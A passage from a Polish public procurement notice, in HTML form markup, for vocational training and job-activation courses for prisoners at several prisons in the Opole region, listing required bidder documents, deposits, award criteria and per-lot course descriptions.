b) w celu potwierdzenia braku podstaw do wykluczenia wykonawcy z postępowania, o których mowa w art.24 ust.1 pkt.15 ustawy Prawo zamówień publicznych: oświadczenie wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo w przypadku wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;
c) w celu potwierdzenia braku podstaw do wykluczenia wykonawcy z postępowania, o których mowa w art.24 ust.1 pkt.22 ustawy Prawo zamówień publicznych: oświadczenia wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;
d) Wykonawca w terminie 3 dni liczonych  od dnia zamieszczenia przez Zamawiającego na stronie internetowej informacji, o której mowa w art.86 ust.5 ustawy Prawo zamówień publicznych (stosownie do treści art. 24 ust.11 ustawy Prawo zamówień publicznych), przekaże Zamawiającemu oświadczenia Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje (dowody) potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Przykład wzoru oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej stanowi załącznik nr 9 do SIWZ;</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a) w sytuacji, o której mowa w pkt. 8.2 lit.a SIWZ, Zamawiający żąda aby Wykonawca złożył zezwolenie o którym mowa w art. 58 ust.3 pkt.1 ustawy z dnia 7.09.1991 roku o systemie oświaty, wydane w postaci decyzji administracyjnej, o której mowa w par.6 ust.1 rozporządzenia ministra edukacji narodowej i sportu z dnia 4 marca 2004 r. w sprawie szczegółowych zasad i warunków udzielania i cofania zezwolenia na założenie szkoły lub placówki publicznej przez osobę prawną lub osobę fizyczną, w formie oryginału lub kopii (potwierdzonej za zgodność z oryginałem na zasadach jak w pkt.11.6 SIWZ).
b) w sytuacji, o której mowa w pkt. 8.2 lit.b SIWZ, Zamawiający żąda aby Wykonawca złożył zaświadczenia o wpisie do ewidencji, o której mowa w z art. 82 ust.1 ustawy z dnia 7.09.1991 roku o systemie oświaty /Dz.U. z 2004r Nr 256 poz.2572 z późn. zm./), w formie oryginału lub kopii (potwierdzonej za zgodność z oryginałem na zasadach jak w pkt.11.6 SIWZ)   
c) dla potwierdzenia spełniania wymogu z pkt. 8.3 lit.b SIWZ wykonawca złoży wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Wykaz, o którym mowa winien posiadać dane uwzględnione w załączniku nr 16 do SIWZ.
d) dla potwierdzenia spełniania wymogu z pkt. 8.3 lit.a SIWZ wykonawca złoży wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykaz, o którym mowa winien posiadać dane uwzględnione w załączniku nr 7 do SIWZ.

   Dla potwierdzenia spełniania wymogu, o którym mowa w pkt.8.4 SIWZ Zamawiający żąda od Wykonawcy:
e) przedstawienia decyzji w sprawie przyznania statusu zakładu pracy chronionej lub zakładu aktywności zawodowej, o której mowa w ustawie z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz. U. z 2011 r. poz. 721, z późn. zm.), lub innych dokumentów potwierdzających status wykonawcy jako zakładu pracy chronionej lub potwierdzających prowadzenie przez wykonawcę, lub przez jego wyodrębnioną organizacyjnie jednostkę, która będzie realizowała zamówienie publiczne, działalności obejmującej społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych;
f) przedstawienia dokumentów potwierdzających procentowy wskaźnik zatrudnienia osób należących do kategorii, o której mowa w pkt.8.4 SIWZ, zatrudnionych przez zakłady pracy chronionej lub wykonawcę lub jego wyodrębnioną organizacyjnie jednostkę, która będzie realizowała zamówienie.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Wypełniony i podpisany formularz ofertowy - załącznik nr 3 do SIWZ,
2. Pełnomocnictwo, jeśli dla wykonawcy taki wymóg wynika z pkt.10-12 SIWZ. Wszystkie pełnomocnictwa, które Wykonawca złoży wraz z Ofertą należy złożyć w oryginale lub kopii poświadczonej notarialnie, bądź przez osoby udzielające pełnomocnictwa.  
3. Jednolity Europejski Dokument Zamówienia, w formie o której mowa w pkt.10.1 SIWZ: 
dotyczący Wykonawcy ubiegających się o zamówienie, uwzględniając pkt.12.5 SIWZ dla wykonawców wspólnie ubiegających się o zamówienie; dla każdego z podmiotów trzecich (z osobna), o których mowa w pkt. 14.4 SIWZ, jeśli takie podmioty występują.  
4. kopia potwierdzenia wpłaty wadium w pieniądzu, jeśli w takiej formy wadium Wykonawca skorzystał; 
5. kopia lub oryginał dokumentu potwierdzającego wniesienie wadium jeśli wadium jest wpłacone w innej formie niż pieniężnej (oryginał wadium może być złożony u Zamawiającego wraz z ofertą lub złożony osobno jednakże tylko w terminie składania ofert).
6. zobowiązanie podmiotu trzeciego do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (opisano w pkt.14.2 SIWZ).
7. Wykaz osób skierowanych przez wykonawcę do realizację zamówienia publicznego - załącznik nr 7 do SIWZ.
8. Zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy zamówienia publicznego niezbędnych zasobów na okres korzystania z nich przez wykonawcę przy wykonywaniu zamówienia w zakresie złożonej przez wykonawcę oferty - załącznik nr 10 do SIWZ.
9. Aktualny na dzień złożenia zamawiającemu wykaz usług wykonanych w przypadku świadczeń okresowych - usług wykonanych w zakresie opisanym w pkt. 8.4. lit. b SIWZ.
10. Oświadczenie wykonawcy informujące o zatrudnionych osobach fizycznych uczestniczących w wykonywaniu zamówienia w zakresie organizacji cykli szkoleniowo - aktywizacyjnych, wymagane przez zamawiającego na podstawie art. 29 ust. 3a. </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Każda oferta musi być zabezpieczona wadium. Zamawiający ustala wadium:
a) w wysokości 1260 PLN na zamówienie częściowe nr I w rozumieniu pkt. 4 SIWZ 
b) w wysokości 900 PLN na zamówienie częściowe nr II w rozumieniu pkt. 4 SIWZ 
c) w wysokości 1080 PLN na zamówienie częściowe nr III w rozumieniu pkt. 4 SIWZ 
d) w wysokości 1260 PLN na zamówienie częściowe nr IV w rozumieniu pkt. 4 SIWZ 
e) w wysokości 1080 PLN na zamówienie częściowe nr V w rozumieniu pkt. 4 SIWZ 
f) w wysokości 1080 PLN na zamówienie częściowe nr VI w rozumieniu pkt. 4 SIWZ 
g) w wysokości 1080 PLN na zamówienie częściowe nr VII w rozumieniu pkt. 4 SIWZ 
h) w wysokości 900 PLN na zamówienie częściowe nr VIII w rozumieniu pkt. 4 SIWZ 
Zasady i formy wnoszenia wadium określa określa pkt 17.3 do 17.13 SIWZ.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>60.00</td></tr><tr><td>Termin płatności</td><td>17.00</td></tr><tr><td>Uprawnienia pedagogiczne</td><td>18.00</td></tr><tr><td>Marginalizacja</td><td>5.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający, zgodnie z art.144 ust.1 pkt.1 ustawy Prawo zamówień publicznych, przewiduje możliwość zmiany umowy w stosunku do treści oferty, na podstawie której zostanie dokonany wybór Wykonawcy, w następującym zakresie: 
a) zmniejszenie zakresu przedmiotu umowy wraz z proporcjonalnym do tego zmniejszeniem wynagrodzenia w umowie w sytuacji wystąpienia siły wyższej (tj. wojny; - działań wojennych; - działań wrogów zewnętrznych; - terroryzm; - rewolucja; - przewrót wojskowy lub cywilny; - wojna domowa; - skutki zastosowania amunicji wojskowej; - materiałów wybuchowych; - skażenia radioaktywnego, z wyjątkiem tych które mogą być spowodowane użyciem ich przez wykonawcę; - klęski żywiołowej; - bunty, niepokoje, strajki) uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami; 
b) zmiana zapisów w umowie wymagana zmianą w obowiązujących powszechnie przepisach prawa mających wpływ na treść umowy; 
c) zmiana terminu realizacji cyklu na inny niż wynikający z par. 3 ust.1 pod warunkiem zawarcia niniejszej umowy w takiej dacie, która uniemożliwia dochowanie jej warunków związanych z realizacją danego cyklu.
Zmiany umowy mogą nastąpić pod łącznie następującymi warunkami formalnymi:
a) zmiany zostaną dokonane na piśmie w formie aneksu do umowy pod rygorem nieważności,
b) okoliczności faktyczne uzasadniające dokonanie zmiany zostaną wskazane w preambule aneksu do umowy wraz z powołaniem się na zaistniałą okoliczność wymienioną powyżej.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/04/2017, godzina: 9:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              POLSKI<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 60 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karępozbawienia wolności w Zakładzie Karnym w Brzegu.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Cykl nr 1. Kucharz, połączony z aktywizacją zawodową, ilość godzin 136, liczba uczestników  12 osadzonych mężczyzn.
Cykl nr 2. Kucharz, połączony z aktywizacją zawodową, ilość godzin 136, liczba uczestników  12 osadzonych mężczyzn.
Cykl nr 3. Malarz tapeciarz połączony z aktywizacją zawodową, ilość godzin 120, liczba uczestników  12osadzonych mężczyzn.
Cykl nr 4. Malarz tapeciarz połączony z aktywizacją zawodową, ilość godzin 120, liczba uczestników  12osadzonych mężczyzn.
Cykl nr 5. Brukarz połączony z aktywizacją zawodową, ilość godzin 136, liczba uczestników  12 osadzonych mężczyzn.
Cykl nr 6. Elektryk z uprawnieniami E do 1 kV połączony z aktywizacją zawodową, ilość godzin 136, liczba uczestników  12 osadzonych mężczyzn
Cykl nr 7. Fryzjer połączony z aktywizacją zawodową, ilość godzin 136, liczba uczestników  12 osadzonych mężczyzn.
Wadium: 1 260 PLN.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80500000-9, 80530000-8,
                    80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>60.00</td></tr><tr><td>termi płatności</td><td>17.00</td></tr><tr><td>uprawnienia pedagogiczne</td><td>18.00</td></tr><tr><td>marginalizacja</td><td>5.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karępozbawienia wolności w Zakładzie Karnym w Głubczycach.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Cykl nr 1. Technolog wykończenia wnętrz połączony z aktywizacją zawodową, ilość godzin  120, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 2. Technolog wykończenia wnętrz połączony z aktywizacją zawodową, ilość godzin  120, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 3. Brukarz połączony z aktywizacją zawodową, ilość godzin  120, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 4. Brukarz połączony z aktywizacją zawodową, ilość godzin  120, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 5. Brukarz połączony z aktywizacją zawodową, ilość godzin  120, ilość uczestników  12 osadzonych mężczyzn.
Wadium: 900 PLN.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80500000-9, 80530000-8,
                    80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>60.00</td></tr><tr><td>termin płatności</td><td>17.00</td></tr><tr><td>uprawnienia pedagogiczne</td><td>18.00</td></tr><tr><td>marginalizacja</td><td>5.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karępozbawienia wolności w Zakładzie Karnym w Kluczborku<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Cykl nr 1. Fryzjer połączony z aktywizacją zawodową, ilość godzin  100, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 2. Spawacz metodą MIG połączony z aktywizacją zawodową, ilość godzin  179, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 3. Brukarz połączony z aktywizacją zawodową, ilość godzin  109, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 4. Elektryk uprawnienia E do 1kV połączony z aktywizacją zawodową, ilość godzin  100, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 5. Operator wózków jezdniowych z napędem silnikowym połączony z aktywizacją zawodową, ilość godzin  100, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 6. Tapicer połączony z aktywizacją zawodową, ilość godzin 120, ilość uczestników  12 osadzonych mężczyzn.
Wadium: 1 080 PLN.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80500000-9, 80530000-8,
                    80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty </td><td>60.00</td></tr><tr><td>termin płatności</td><td>17.00</td></tr><tr><td>uprawnienia pedagogiczne</td><td>18.00</td></tr><tr><td>marginalizacja</td><td>5.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karępozbawienia wolności w Zakładzie Karnym w Nysie.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Cykl nr 1. Brukarz połączony z aktywizacją zawodową, ilość godzin  136, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 2. Brukarz połączony z aktywizacją zawodową, ilość godzin  136, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 3. Malarz połączony z aktywizacją zawodową, ilość godzin  136, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 4. Monter izolacji cieplnej połączony z aktywizacją zawodową, ilość godzin  136, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 5. Spawacz metodą TIG połączony z aktywizacją zawodową, ilość godzin  136, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 6. Technolog wykończenia wnętrz połączony z aktywizacją zawodową, ilość godzin  136, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 7. Technolog wykończenia wnętrz połączony z aktywizacją zawodową, ilość godzin  136, ilość uczestników  12 osadzonych mężczyzn.
Wadium: 1 260 PLN.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80500000-9, 80530000-8,
                    80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>60.00</td></tr><tr><td>termin płatności</td><td>17.00</td></tr><tr><td>uprawnienia pedagogiczne</td><td>18.00</td></tr><tr><td>marginalizacja</td><td>5.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karępozbawienia wolności w Zakładzie Karnym w Sierakowie Śląskim.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Cykl nr 1. Operator maszyn i urządzeń przetwórstwa tworzyw sztucznych połączony z aktywizacją zawodową,ilość godzin  106, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 2. Operator maszyn i urządzeń przetwórstwa tworzyw sztucznych połączony z aktywizacją zawodową,ilość godzin  106, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 3. Malarz wykończeniowy połączony z aktywizacją zawodową, ilość godzin  110, ilość uczestników 12 osadzonych mężczyzn.
